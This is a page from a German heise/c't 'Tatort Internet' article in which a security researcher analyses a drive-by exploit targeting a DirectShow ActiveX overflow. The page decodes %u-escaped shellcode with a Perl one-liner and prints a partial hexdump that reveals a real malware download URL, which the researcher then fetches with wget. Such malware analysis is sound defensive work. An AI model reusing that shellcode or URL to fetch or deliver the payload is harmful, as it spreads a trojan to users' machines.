Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten

Tatort Internet: Alarm beim Pizzadienst

Seite 4: Hab ich dich!

Inhaltsverzeichnis

Hab ich dich!

Ganz offenbar versucht der Exploit hier das verwundbare ActiveX-Control aufzurufen, um darin den im heise-Security-Artikel beschriebenen Pufferüberlauf auszulösen. Und ich will ein l4m3r sein, wenn dx_ds.gif tatsächlich ein Bild enthält und nicht ein speziell präpariertes MPEG2-Filmchen mit den dazu nötigen MPEG2TuneRequest-Objekten. Doch die auseinanderzunehmen führt in die falsche Richtung. Den Hacker-Gral haben wir ja bereits in Form des Shellcodes. Der wird mir jetzt verraten, was der Exploit eigentlich mit meinem Rechner vorhatte.

Dazu kopiere ich ihn in eine Datei namens 1.sc und wende ein wenig weiße Perl-Magie an:

$ perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' < 1.sc

Natürlich ist das keine Magie, sondern eine auf die Schnelle improvisierte Perl-Version der JavaScript-Funktion unescape, die mir die benötigten Binärdaten liefert. Dort muss er stecken... Et voilà – hexdump -C bringt die Ausgabe in eine lesbare Form.

00000000  64 a1 18 00 00 00 8b 40  30 8b 40 54 8b 40 04 8b  |d......@0.@T.@..|
00000010  40 04 8b 40 04 0d 20 00  20 00 3d 7c 00 77 00 74  |@..@.. . .=|.w.t|
00000020  01 c3 33 c0 64 8b 40 30  78 0c 8b 40 0c 8b 70 1c  |..3.d.@0x..@..p.|
[... Code ...]
00000240  32 c6 d2 c0 02 c1 02 c5  02 c2 02 c6 d2 c8 2a c1  |2.............*.|
00000250  2a c5 f6 d0 2a c2 2a c6  d2 c0 d3 c2 0f ca 88 07  |*...*.*.........|
00000260  47 49 75 ce c3 c3 68 74  74 70 3a 2f 2f 74 69 73  |GIu...http://tis|
00000270  73 6f 74 33 33 33 2e 63  6e 2f 65 6c 65 6f 6e 6f  |sot333.cn/eleono|
00000280  72 65 2f 67 65 74 65 78  65 2e 70 68 70 3f 73 70  |re/getexe.php?sp|
00000290  6c 3d 44 69 72 65 63 74  58 5f 44 53 0a           |l=DirectX_DS.|

Ich hab es fast geschafft. Diese URL ist offenbar das nächste Ziel. Dort lädt der Exploit die eigentliche Schadsoftware nach und hat vermutlich damit den Trojaner-Alarm des Virenwächters ausgelöst. Ein letztes wget bestätigt den Verdacht: Da ist er wieder, der Trojaner-Alarm.

Alles in allem hab ich nochmal Glück gehabt, denn ein Test bei Virustotal zeigt, dass derzeit gerade mal 21 von 43 Virenscannern den Schädling erkennen. Doch so weit kam es nur, weil ich vergessen hatte, die automatische Installation der Windows Updates wieder einzuschalten und damit ein wichtiges Sicherheits-Update verschlafen hatte.

Während Windows jetzt die versäumten Updates nachholt, kann ich mir endlich das verdiente Abendessen organisieren. Aber der Appetit auf Pizza ist mir vergangen – heute gibt's Sushi, das ich ganz altmodisch via Telefon bestelle. (ju)

Diskutieren Sie mit im Forum zu Tatort Internet.

Über "Tatort Internet"

Die Serie "Tatort Internet" wurde ursprünglich im c't magazin ab Heft 13/2010 veröffentlicht. In den Artikeln können Sie Experten über die Schulter schauen, wie sie verdächtige Dateien analysieren und Schädlingen auf die Schliche kommen. Alle in der Serie vorgestellten Malware-Samples stammen aus echten Angriffen und wurden unter anderem mit den hier vorgestellten Methoden entlarvt. Die Geschichten "drumherum" wurden durch reale Vorkommnisse inspiriert ;-)

Der Experte dieser Folge, Thorsten Holz, hat das deutsche Honeynet-Projekt mit ins Leben gerufen, das seit 2004 verwundbare Systeme im Internet platziert, um Angriffe gegen diese Systeme zu analysieren. Mittlerweile forscht er in diesem Bereich als Juniorprofessor an der Ruhr-Universität Bochum. In der nächsten Folge Zeig mir das Bild vom Tod stolpert Frank Boldewin über eine verdächtige MS-Office-Datei.

Übersicht aller Folgen:

  1. Alarm beim Pizzadienst
  2. Zeig mir das Bild vom Tod
  3. PDF mit Zeitbombe
  4. Angriff der Killervideos
  5. Matrjoschka in Flash

(ju)

Spiele

nach oben
Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten